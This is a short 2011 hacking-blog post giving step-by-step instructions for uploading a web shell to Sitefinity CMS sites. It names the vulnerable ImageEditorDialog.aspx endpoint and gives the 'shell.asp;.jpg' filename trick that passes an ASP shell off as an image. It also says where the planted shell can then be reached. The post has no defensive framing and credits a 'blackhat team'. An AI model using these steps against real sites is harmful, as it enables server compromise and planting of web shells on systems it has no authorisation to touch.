Sitefinity CMS (ASP.NET) Shell Upload Vulnerability

Posted in Wednesday, 27 July 2011
by Saadi
0 comments

exploit # /UserControls/Dialogs/ImageEditorDialog.aspx

first go to # http://site.com/sitefinity/

then # http://site.com/sitefinity/UserContr...torDialog.aspx

select # asp renamed via the .asp;.jpg (shell.asp;.jpg)

Upload to # http://site.com/Images/[shell]


credit goes to blackhat team !!

0 comments:

Post a Comment

Pages

Powered by Blogger.

Translator

Visitors

free counters

Your Infomation

IP
Blogger Widgets

Copyright 2010 @ Hacking Pro
Blogger Templates by Blogger Template Place | supported by One-4-All
Designedby:Watch The Office OnlineCodedby:Cash Back Free Cell Phones|watch Human Target online|website hosting